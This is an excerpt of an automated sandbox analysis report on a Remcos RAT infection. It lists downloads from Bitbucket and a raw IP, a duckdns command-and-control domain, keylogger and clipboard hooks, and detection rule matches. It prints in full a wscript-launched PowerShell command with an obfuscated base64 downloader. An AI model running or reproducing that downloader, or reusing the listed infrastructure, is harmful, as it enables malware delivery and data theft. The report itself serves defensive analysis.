                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_004260F7 recv,15_2_004260F7
                  Source: global traffic | HTTP traffic detected: GET /hector4576--/noviembre19/downloads/sos19nov.txt HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-4933-9209-c427ee8593c3/sos19nov.txt?response-content-disposition=attachment%3B%20filename%3D%22sos19nov.txt%22&AWSAccessKeyId=ASIA6KOSE3BNAFA7CVMF&Signature=CrqtinwQM9TwM0anNtAwVi%2FidaU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIAKzZNZVNquQX%2BXMBwIz3Gvp%2FzjvC75dgiHgFrLVQIrzAiEAyI%2BZsi%2BwpMDAd330CJIQTPVFocQWII%2BkpnE7UVC%2BwdIqsAIIiv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJnUG9TTIzYCxgnmbCqEAt0YUQ4Qb48el4w9P01DiBwFyGBLP%2BC%2BM7M%2BQgpF6ZxRMLViqwNLPWKBCNcN6xbQ%2BWj9KOJJ40F9GMTKMGmSrRDa7Sw%2B2BVBoDUFg67l4vBd6pqKGeBX%2FfGU3tPxGALlmzyQ4YTla7QXvlf1JNUj3XCK%2B5NpynyKTH12PVJfQAMWSDPYFBK9dDBXze8JvTItxPBnjCxudqV9nsVaS%2F9bbevYEMeURk4H91sf6bdcXClhveK6km9qD7ElBzIYd6iXaf55cVFeGNhva9QwPSLjcwS7muN%2F1rYtl9xshGU27AuU6lZnBs3nMfKNZb7KwfIYM8woGd4YEbv9d3Klr6E8MYC8QEIOMJi69rkGOp0BH0DycpkzBfU%2FgJlwSbJ7VuYKCAg6AvvthUTyyFvJgPvFXtLaetF5p0abeOwV8y33NNEU8mMXjgJqQ080SNiFV835eFr%2BbBRHNf7rm1neySGwglrM1o8LsYX0RovAU3W%2Bx4JB4pgdN4qsn1bW%2BfaD7XZjyLKF0JoYGK%2F0OwIw8v9GO6Ju75QefPFbX9xbLBwYMrmWW0lhQ%2B5mF%2BEx1g%3D%3D&Expires=1732092960 HTTP/1.1 Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/AD/dll.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 91.202.233.169 Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt HTTP/1.1 Host: 91.202.233.169 Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
                  Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
                  Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                  Source: global traffic | DNS traffic detected: DNS query: remcosnov24.duckdns.org
                  Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F1153A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.202.
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F1153A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.169
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/A
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt
                  Source: powershell.exe, 00000007.00000002.1425303708.0000025F0E6E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.202.H
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://bbuseruploads.s3.amazonaws.com
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://bitbucket.org
                  Source: powershell.exe, 00000007.00000002.1515951705.0000025F28EB4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.veris
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpSystem32
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpk
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpl
                  Source: powershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F11E38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C410EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C32A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 0000000D.00000002.1356648553.0000026C328FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s3-w.us-east-1.amazonaws.com
                  Source: powershell.exe, 00000002.00000002.1540300511.0000022615AE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F103E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C31071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000D.00000002.1356648553.0000026C32531000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 0000000D.00000002.1356648553.0000026C328FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000002.00000002.1540300511.0000022615AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1540300511.0000022615A9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F103E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C31071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aui-cdn.atlassian.com/
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazohj6
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/hector4576--/noviembre19/downloads/sos
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/hector4576--/noviembre19/downloads/sos19nov.txt
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.cookielaw.org/
                  Source: powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                  Source: powershell.exe, 0000000D.00000002.1356648553.0000026C328FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F1153A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F11E38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C410EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C32A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 0000000D.00000002.1356648553.0000026C32531000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
                  Source: powershell.exe, 0000000D.00000002.1356648553.0000026C32531000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                  Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknown | HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.7:49737 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 52.217.196.57:443 -> 192.168.2.7:49747 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000,15_2_004099E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_004159C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,15_2_00409B10
                  Source: Yara match | File source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR

                  E-Banking Fraud

                  Source: Yara match | File source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR
                  Source: Yara match | File source: C:\ProgramData\remcos\registros.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_0041BB77 SystemParametersInfoW,15_2_0041BB77

                  System Summary

                  Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects known downloader agent Author: ditekSHen
                  Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 5896, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?B
v?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process Stats: CPU usage > 49%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_004158B9 ExitWindowsEx, LoadLibraryA, GetProcAddress
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFAAC480FFA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFAAC55115D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_0041D071
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_004520D2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_0043D098
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00437150
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_004361AA
